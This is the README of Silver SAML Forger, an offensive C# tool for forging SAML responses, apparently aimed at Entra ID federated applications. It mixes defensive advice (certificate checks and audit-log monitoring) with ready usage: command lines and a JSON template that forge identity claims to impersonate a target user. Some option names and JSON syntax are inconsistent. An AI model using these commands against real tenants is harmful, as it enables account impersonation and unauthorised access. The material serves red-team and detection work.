Silver SAML Forger is C# tool that helps you create custom SAML responses. It can be used to implement the Silver SAML attack.
More details are avaiable in this post Meet Silver SAML, Golden SAML In the Cloud.
To safeguard effectively against Silver SAML attacks in Entra ID, your organization should only use Entra ID signed certificates for SAML signing purposes. SAML signing certificates are stored in the service principal for a SAML application in Entra ID. You can use the Microsoft Graph API to view the information that is exposed about the signing key. Simply call a GET request to the following URI: https://graph.microsoft.com/beta/servicePrincipals/{serviceprincipalobjectid}
Organizations can audit existing service principals that are configured for SAML and check the displayName. If the currently used certificate is generated by Microsoft, the certificate will contain the value CN=Microsoft Azure Federated SSO Certificate. However, nothing prevents an attacker from importing an external certificate that has the same name.
Example of the exposed information - Note that the private key material is not exportable, preventing attackers from gathering the information they need to launch a Silver SAML attack.
{
"customKeyIdentifier": "Gk//vUF/JYC58HRyyuGMM5ydmOuJVUL74R6OszKQn6w=",
"endDateTime": "2026-08-08T14:19:35Z",
"keyId": "66ad0fe4-111d-45da-924c-545913d77be9",
"startDateTime": "2023-08-08T14:19:36Z",
"type": "AsymmetricX509Cert",
"usage": "Sign",
"key": null,
"displayName": "CN=Microsoft Azure Federated SSO Certificate",
"hasExtendedValue": null
}
Organizations can monitor Entra ID audit logs for changes to PreferredTokenSigningKeyThumbprint under ApplicationManagement. You will need to correlate those events to Add service principal credential events that relate to the service principal. The rotation of expired certificates is a common process, so you will need to determine whether the audit events are legitimate. Implementing change control processes to document the rotation can help to minimize confusion during rotation events.
The tool requires a set of parameters to be able to generate the SAML responses. Two options are available :
1. To manually pass them.
2. Pass them using a JSON file.
Using the generate command we can manually pass the parameters as such -
-
--pfxFile- Specify the path for the pfx file. -
--pfxPassword- Specify the password for the pfx file. -
--idpid- The Identity Provider Identifier. -
--recipient- The recipient in the SAML response. -
--subjectnameid- The subjectNameID in the SAML response. -
--audience- The audience in the SAML response. -
--attributes- The attributes/claims inside the assertion in the SAML reponse. In a key,value format.
Example - generate
SilverSAMLForger.exe generate --pfxPath C:\path\to\certificate.pfx --pfxPassword mycertpassword --idpid https://myidpid.com --recipient https://thesamlrecipient.com/sso/saml2/random --subjectnameid target@target.com --audience https://someaudience.com/saml2/service-provider/example --attributes http://schemas.microsoft.com/identity/claims/tenantid=<tenantID>,http://schemas.microsoft.com/identity/claims/objectidentifier=<objectID>,http://schemas.microsoft.com/identity/claims/displayname=<displayName>,http://schemas.microsoft.com/identity/claims/identityprovider=<identityProviderID>,http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress=<targetEmail>,http://schemas.microsoft.com/claims/authnmethodsreferences=http://schemas.microsoft.com/ws/2008/06/identity/authenticationmethod/password,http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname=<GivenName>,http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname=<SurName>,<AnythingYouWant>=<AnyValue>
Example Json File -
{
"pfxPath": "C:\\Path:\\To\\Certificate.pfx",
"pfxPassword": "<Password>",
"idpid": "<IdpId>",
"recipient": "<Recipient>",
"subjectnameid": "<SubjectNameID>",
"audience": "<Audience>",
"attributes": {
"http://schemas.microsoft.com/identity/claims/tenantid": "<TetnantID>",
"http://schemas.microsoft.com/identity/claims/objectidentifier": "<ObjectID>",
"http://schemas.microsoft.com/identity/claims/displayname": "<DisplayName>",
"http://schemas.microsoft.com/identity/claims/identityprovider": "<IdPID",
"http://schemas.microsoft.com/claims/authnmethodsreferences": "http://schemas.microsoft.com/ws/2008/06/identity/authenticationmethod/password",
"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname": "<GivenName>",
"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname": "<SurName>",
"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress": "<Email>",
"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name": "<Name>"
"<Anything>" : "<Anything>"
}
}
Using the generateJSON command we can generate a SAML response that loads the parameters from a json. It needs to be structured as such -
SilverSAMLForger.exe generateJSON --jsonFile path_to_json_file.json
The output is a base64 and URL encoded SAML response.
